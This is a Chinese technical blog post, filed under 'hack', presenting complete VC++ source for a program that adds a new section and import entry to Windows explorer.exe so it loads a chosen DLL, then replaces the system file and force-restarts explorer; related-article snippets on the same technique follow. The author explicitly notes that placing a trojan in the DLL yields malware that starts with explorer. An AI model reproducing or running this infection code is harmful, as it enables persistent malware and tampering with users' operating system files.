PE增加导入表注入

最新推荐文章于 2023-07-14 15:01:09 发布
最新推荐文章于 2023-07-14 15:01:09 发布
阅读量4.3k 收藏 2
点赞数
分类专栏: hack 文章标签: vc
本文介绍了一种将DLL注入到Explorer进程的技术,通过修改Explorer.exe使其加载特定DLL,并在DLL加载时启动线程输出消息,展示了如何实现这一过程的源代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在explorer.exe中添加了MyDLL.dll的一个导出函数MainFun,如果你想先看看效果可以先把附件下下来,把其中的MyDLL.dll放入环境变量path目录中,例如system32目录就可满足你的需要,然后运行InfectImport.exe,你会看到一个对话框“MainFun成功导入explorer.exe”,因为我在dll被加载时启动了一个线程,然后输出这句话,是不是有点小题大作了,呵呵,一点也没有小题大作,当把木马程序放入线程函数中就会成为一个不需要远程线程注入的随explorer.exe启动的木马了,是不是有点心动啊,呵呵,不过还是不要干非法勾当为好,技术交流就好。
以下为源代码,在vc++6.0中编译通过.


#include <windows.h>
#include <IMAGEHLP.H>
#include <stdio.h>
#pragma comment(lib,"IMAGEHLP.lib")


//用来计算对齐数据后的大小
int alig(int size,unsigned int align)
{
  if(size%align!=0)
    return (size/align+1)*align;
  else 
    return size;
}


int main()
{
  char WinPath[MAX_PATH];   
  char FilePath[MAX_PATH];
  char NewPath[MAX_PATH];
  char TemPath[MAX_PATH];
  char LogPath[MAX_PATH];
  FILE* fp;
  
  ::GetWindowsDirectory(WinPath,sizeof(WinPath));  //获取windows所在目录
  ::memcpy(FilePath,WinPath,sizeof(WinPath));      
  ::memcpy(NewPath,WinPath,sizeof(WinPath));
  ::memcpy(TemPath,WinPath,sizeof(WinPath));
  ::memcpy(LogPath,WinPath,sizeof(WinPath));
  
  ::strcat(FilePath,"\\explorer.exe");             //得到原文件路径
  ::strcat(NewPath,"\\explorer1.exe");             //修改文件路径
  ::strcat(TemPath,"\\temp.mainst");               //临时文件路径
  ::strcat(LogPath,"\\log.dat");             //log文件路径,防止修改修改过的explorer.exe
  
  //拷贝原始文件,为修改做准备
  ::CopyFile(FilePath,NewPath,false);
  ::CopyFile(FilePath,TemPath,false);
  
  fp=::fopen(LogPath,"r");
  if(fp != NULL) 
  {
    MessageBox(NULL,"explorer.exe已被修改过!","提示",MB_OK);
    return 1;
  }
  
  //打开需要修改的文件
  fp=::fopen(NewPath,"rb+");
  if(fp==NULL) 
  {
    ::DeleteFile(NewPath);
    ::DeleteFile(TemPath);
    return 0;
  }
  
  //往explorer.exe中添加我们准备好的函数
  LOADED_IMAGE img;
  HANDLE hFile;
  PUCHAR lpBaseAddr;
  PIMAGE_NT_HEADERS lpPEhead;
  PIMAGE_IMPORT_DESCRIPTOR lpImport,lpNewImport;
  ULONG ImportSize,NewImportSize;
  PIMAGE_SECTION_HEADER lpFirstSection;
  //保存文件对齐值与区块对齐值
  int SECTION_ALIG;
  int FILE_ALIG;
  int fre=0;
  int i=0;
  int nOldSectionNo;
  DWORD NewSecRVA,NewOffset,ThunkRVA,ImportRVA;
  IMAGE_SECTION_HEADER  NewSection;//要添加的区块
  IMAGE_NT_HEADERS NewNThead;
  memset(&NewSection, 0, sizeof(IMAGE_SECTION_HEADER));
  IMAGE_SECTION_HEADER LastSection;                            //再定义一个区块,来保存原文件最后一个区块的信息
  
  //对以下使用的函数如果不太熟悉的,可以看看与PE文件相关的函数
  if(MapAndLoad("temp.mainst",WinPath,&img,false,false))       //获得PE文件相关数据
  { 
    hFile=img.hFile;
    lpBaseAddr=img.MappedAddress;
    lpPEhead=img.FileHeader;
    lpImport=(PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToData
      
      (lpBaseAddr,FALSE,IMAGE_DIRECTORY_ENTRY_IMPORT,&ImportSize);
    ImportSize=lpPEhead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
    nOldSectionNo=lpPEhead->FileHeader.NumberOfSections;
    SECTION_ALIG=lpPEhead->OptionalHeader.SectionAlignment;
    FILE_ALIG=lpPEhead->OptionalHeader.FileAlignment;
    lpFirstSection=img.Sections;
    NewImportSize=ImportSize+sizeof(IMAGE_IMPORT_DESCRIPTOR);
    //获取最后一个节
    memcpy(&LastSection,(PIMAGE_SECTION_HEADER)((DWORD)img.Sections+sizeof(IMAGE_SECTION_HEADER)*(nOldSectionNo-1)),sizeof(IMAGE_SECTION_HEADER));    
    //计算新节的RVA
    NewSecRVA=LastSection.VirtualAddress+alig(LastSection.Misc.VirtualSize,SECTION_ALIG);
    //计算新节的文件偏移
    NewOffset=LastSection.PointerToRawData+alig(LastSection.SizeOfRawData,FILE_ALIG);
    //写入DLL名
    fseek(fp,NewOffset,SEEK_SET);
    fre=sizeof("MyDLL.dll");
    ::fwrite("MyDLL.dll",sizeof("MyDLL.dll"),1,fp);
    
    //准备IMAGE_IMPORT_BY_NAME结构
    IMAGE_IMPORT_BY_NAME ImportFun;
    ImportFun.Hint=0;
    memcpy(ImportFun.Name,"MainFun",sizeof("MainFun"));
    
    DWORD ThunkData[2];
    ThunkData[0]=NewSecRVA+fre;
    ThunkData[1]=0;
    
    //写入IMAGE_IMPORT_BY_NAME结构
    fseek(fp,NewOffset+fre,SEEK_SET);
    fre+=sizeof("MainFun")+sizeof(WORD);
    ::fwrite(&ImportFun,sizeof("MainFun")+sizeof(WORD),1,fp);
    
    fseek(fp,NewOffset+fre,SEEK_SET);
    ThunkRVA=NewSecRVA+fre;
    fre+=sizeof(DWORD)*2;
    ::fwrite(ThunkData,sizeof(DWORD)*2,1,fp);
    
    ImportRVA=NewSecRVA+fre;
    //准备新导入表结构,用来写入新文件
    lpNewImport=(PIMAGE_IMPORT_DESCRIPTOR)::malloc(NewImportSize);
    memset(lpNewImport,0,NewImportSize);
    memcpy(lpNewImport,lpImport,ImportSize);
    
    //在导入表尾部组织一个新的导入项
    while(1)
    {
      if(lpNewImport[i].OriginalFirstThunk == 0 && lpNewImport[i].TimeDateStamp == 0 && 
        lpNewImport[i].ForwarderChain == 0 && lpNewImport[i].Name == 0 && lpNewImport[i].FirstThunk == 0)
      {
        lpNewImport[i].Name=NewSecRVA;
        lpNewImport[i].TimeDateStamp=0;
        lpNewImport[i].ForwarderChain=0;
        lpNewImport[i].FirstThunk=ThunkRVA;
        lpNewImport[i].OriginalFirstThunk=ThunkRVA;
        break;
      }
      else i++;
    }
    
    fseek(fp,NewOffset+fre,SEEK_SET);
    fre += NewImportSize;
    fwrite(lpNewImport,NewImportSize,1,fp);
    ::free(lpNewImport);
    
    //文件对齐
    int num=alig(fre,FILE_ALIG)-fre;
    for(i=0; i<num; i++)
      fputc('\0',fp);
    //添加名为.newsec的新节
    strcpy((char*)NewSection.Name,".newsec");
    NewSection.VirtualAddress=NewSecRVA;
    NewSection.PointerToRawData=NewOffset;
    NewSection.Misc.VirtualSize=alig(fre,SECTION_ALIG);
    NewSection.SizeOfRawData=alig(fre,FILE_ALIG);
    NewSection.Characteristics=0xC0000040;
    
    fseek(fp,((DWORD)lpFirstSection-(DWORD)lpBaseAddr)+sizeof(IMAGE_SECTION_HEADER)*nOldSectionNo,0);
    
    //写入新的节表
    fwrite(&NewSection,sizeof(IMAGE_SECTION_HEADER),1,fp);
    
    //更新第一块节表属性
    //此处为我困惑的地方,为什么要把第一个节的属性设为0xE0000020
    //这个结论我是从比较loadPE修改过的文件中得出的
    //如果没有此处工作,修改后的文件无法正常运行
    //希望高人能给我解答下
    memcpy(&NewSection,lpFirstSection,sizeof(IMAGE_SECTION_HEADER));
    NewSection.Characteristics=0xE0000020;
    fseek(fp,(DWORD)lpFirstSection-(DWORD)lpBaseAddr,SEEK_SET);
    fwrite(&NewSection,sizeof(IMAGE_SECTION_HEADER),1,fp);
    
    memcpy(&NewNThead,lpPEhead,sizeof(IMAGE_NT_HEADERS));
    int nNewImageSize=lpPEhead->OptionalHeader.SizeOfImage+alig(fre,SECTION_ALIG);
    NewNThead.OptionalHeader.SizeOfImage=nNewImageSize;
    NewNThead.OptionalHeader.DataDirectory[11].Size=0;
    NewNThead.OptionalHeader.DataDirectory[11].VirtualAddress=0;
    NewNThead.OptionalHeader.DataDirectory[12].Size=0;
    NewNThead.OptionalHeader.DataDirectory[12].VirtualAddress=0;
    NewNThead.FileHeader.NumberOfSections=nOldSectionNo+1;
    NewNThead.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress=ImportRVA;
    NewNThead.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size=NewImportSize;
    fseek(fp,(DWORD)(lpPEhead)-(DWORD)lpBaseAddr,SEEK_SET);
    
    //写入更新后的PE头
    fwrite(&NewNThead,sizeof(IMAGE_NT_HEADERS),1,fp);
    fclose(fp);
    UnMapAndLoad(&img);
  }
  else
  {
    ::DeleteFile(NewPath);
    ::DeleteFile(TemPath);
    return 0;
  }
  
  //删除临时文件
  ::DeleteFile(TemPath);
  //干掉explorer.exe
  ::rename(FilePath,TemPath);
  //让我们修改过后的替换掉explorer.exe
  ::rename(NewPath,FilePath);
  
  //创建日志文件,以免重复修改
  fp=::fopen(LogPath,"w");
  fclose(fp);
  
  //重新运行explorer
  ::system("taskkill /F /im explorer.exe");
  ::system("explorer.exe");
  return 1;
}

通过修改PE加载DLL
Mi1k7ea
06-24 3933
基本概念除了DLL动态注入技术外,还可以通过手工修改PE文件的方式来加载DLL,这种方式只要应用过一次之后,每当进程开始运行时便会自动加载指定的DLL。整体思路如下:1、查看IDT是否有充足的空间,若无则移动IDT至其他位置,若有则直接添加至列末尾;2、若无,修改OPTIONAL头IMPORT TABLE的RVA值并增大Size值,删除绑定导入BOUND IMPORT Table,复制原IAT...
PE导入解析和注入
windows小菜鸡的博客
08-19 729
1、导入 导入是在可选PE头得数据目录项得第二项 其结构如下 其中name是一个RVA,是DLL的名字 OriginalFirstThunk指向INT,为 IMAGE_THUNK_DATA32的结构。这个结构的值中如果最高位为1 ,那么除去最高位的值函数的导出序号,否则为指向IMAGE_IMPORT_BY_NAME的RVA 其结构如下 其中Hint值无关紧要。 ** FirstThunk** 指向的是IAT,其内容结构与OriginalFirstThunk指向的INT一模一样 2、程序启动
改写PE文件导入加载DLL
03-18
通过改写PE文件的导入段,实现DLL的加载。PE文件的导入段记录了系统所要加载的DLL名,以及由该DLL所导出的,PE文件中所用到的函数信息。
PE文件导入的代码注入
谢启东的专栏
05-05 8383
 PE文件导入的代码注入           试想一下,如果通过修改导入,能把PE格式文件中的函数入口点,重定向到自己的程序中来,是不是很酷!这样,在自己在程序中,可以过滤掉对某些函数的调用,或者,设置自己的处理程序,Professional Portable Executable (PE) Protector也就是这样做的。另外,某些rootkit也使用了此方法把恶意代码嵌入
利用模块加载回调函数修改PE导入实现注入
weixin_30697239的博客
07-10 192
最近整理PE文件相关代码的时候,想到如果能在PE刚刚读进内存的时候再去修改内存PE镜像,那不是比直接对PE文件进行操作隐秘多了么? PE文件在运行时会根据导入来进行dll库的“动态链接”,那么如果我们修改PE导入结构,就可以实现对我们自己动态库的导入,从而实现注入。 那么问题来了,选择一个合适的时机显得很重要,网上搜索了一下,大部分都是直接在文件上进行修改,有位同学说用Load...
修改PE文件注入dll
九层台
10-09 4559
修改思路 PE文件中导入dll信息以结构体列形式存储在IDT中。只要将myhack.dll添加到列尾部即可。 IDT结构 IDT的描述在IMAGE_OPTION_HEADER里面的IMPORT Table,通过size可以确定是否有足够的空间让我们添加 IDT是由IMAGE_IMPORT_DESCRIPTION(简称IID)结构体组成的数组,数组末尾以NULL结构体结束。每个IID结构体为0...
滴水逆向——PE导入注入
sunr.
04-19 1218
1.注入概念: 2.导入注入流程: 第一步: 根据目录项(第二个就是导入)得到导入信息: typedef struct _IMAGE_DATA_DIRECTORY { DWORD VirtualAddress; DWORD Size; } IMA...
移动导入/导入注入注入导入后EXE无法运行的BUG解决方案)
qq_32067613的博客
12-09 393
除了移动导入导入注入的基础以外,重要的记录和解决一个bug。
PE结构之导入 IAT注入载入DLL
最新发布
10-14
IAT不在 可写字段.我简单的复制了 导入所在字段的属性.导致无法运行
通过修改PE文件的方式导入DLL(包含详细操作流程)
fanxiaoyao1的博客
06-20 1799
我们需要修改IDT增加一条我们字节DLL文件的IID以达到导入的目的。在NT头下IMAGE_DATA_DIRECTORY_ARRAY结构体,找到导入导入第一个参数的值便为IDT的RVA RVA是程序的相对虚拟地址,我们要想在文件中精确定位IDT,必须要把RVA转位RAW,在上图中也叫FOA(文件偏移,文件中某个位置距离文件头的偏移),具体的计算公式:84CCh属于.rdata节区,VirtualAddress 和PointerToRawData可从节区头中获取。 VirtualAddress 是指
将dll注入到资源管理器explorer.exe中
01-02
将dll注入到资源管理器explorer.exe中
exe将dll注入到explorer.exe资源管理器进程_DLL注入示例.injectdll
03-28
exe将dll注入到explorer.exe资源管理器进程_DLL注入示例.zip
pe-inject 修改程序导入
04-02
编辑修改程序导入增加自定义DLL PE-inject is a special library which allows developers to place their own code into Windows executable files (EXE, DLL, OCX and others). PE-inject was designed to be as simple as possible, to make modification of executables (so called PE-files) as easy as writing a "Hello world!" program. The knowledge of Assembler and Windows PE-EXE file format, which was essential before PE-inject came, is no longer required. To inject your code into foreign executables you only need to make a DLL file with functions you want to inject into PE file, call PE-inject function to place the DLL into the executable and the file is injected. From now on, everytime you run the executable, the injected code will be run first and after it finishes, the old application code will start. PE-inject doesn't need to write any data to harddrive, like some other solutions do. Therefore it can be also used for applications which require highest security, like PE-protection engines. From EXE password protectors, through PE compressors to PE anti-cracking protectors, everything is easy to implement. PE-inject has a really well designed interface, which allows you to use it for almost any purpose related with injection of code into PE-files. Even a virus-like code is possible!
彩虹猫详细简介
2301_78858007的博客
07-14 1469
在这里给大家提一个醒,以watchdog为参数运行的MEMZ.exe进程是有5个的,也就是说这里看到的创建一个线程是“某个进程“的行为,5个进程一共应该创建了5个线程,在后面的分析中大家也要注意这一点。在参数的判断阶段,jnz指令控制了参数判断后程序的执行路径,按空格并在弹出的窗口输入nop,勾选“使用NOP填充”,点击汇编按钮后该行原本的6字节指令变为6个nop,nop的意思是CPU不执行任何动作,那么程序执行到此处,就永远不会发生跳转,一定会执行watchdog部分,我们的目的就达到了。
DLL注入explorer.exe进程
qq_20113959的博客
03-07 3691
**DLL注入explorer.exe进程**   最近一直在学习dll注入远程进程的相关知识,于是有了这篇文章。通过注入的方式会运行程序,在资源管理器中是看不到,相关的进程的,这为程序的隐藏提供了极大的便利。 一、新建dll动态链接库,然后在dllmain.cpp文件中的 “case DLL_PROCESS_ATTACH:”下输入当你dll被进程加载时要执行的代码。这里我们用 “ Messag...
修改导入载入DLL
白日梦
08-17 6934
关于修改EXE文件的导入,实际上是一个很古老的话题了(如果您是此中高手,请不要在这篇文章浪费时间了,如果您发现了其中的问题,还请多多指教).一些PE相关的软件,也都实现了这样的功能,例如Stud_PE.    Stud_PE通过添加一个新节并将导入连同添加的内容一并复制到新节的方法来实现对DLL的导入.    使用这样的方法只要是PE格式的EXE文件,都可以实现导入DLL的功能,但此方法,实现
PE文件本地DLL注入实现
flukeshen的博客
10-25 2372
本工具是通过修改PE文件的OEP位置,让它指向我们插入的代码(调用LoadLibrary函数),从而载入DLL进行程序注入,载入DLL后系统会自动调用DllMain函数,由于修改了OEP,使得我们的代码执行在被注入程序之前,且在同一地址空间里,简直可以为所欲为了。
怎样将自己的DLL加载到Explorer.exe
zgwhjyzx的专栏
08-28 2637
我们知道将动态连接库注入到其他进程中有很多种方法。最常见的方法是使用钩子函数(Hook),但是这种方法主要有两个缺点:第一如果某个进程没有加载User32.dll,那么Hook DLL将永远也不会被加载。第二Hook DLL加载的时机问题,只有在进程发出User32调用的时候, Hook DLL才有可能被加载。也就是说假设进程正在进行复杂的数值计算而没有时间进行消息调用的时候,Hook DLL
VC++技术在导入内代码注入的实现
4. **编程方式注入代码**:在软件开发中,通过编写程序来动态地修改PE文件,添加导入函数并创建导入地址,然后在运行时将地址解析出来并使用。 ### 知识点五:文件名称列与相关工具 - **zimport.zip**:可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值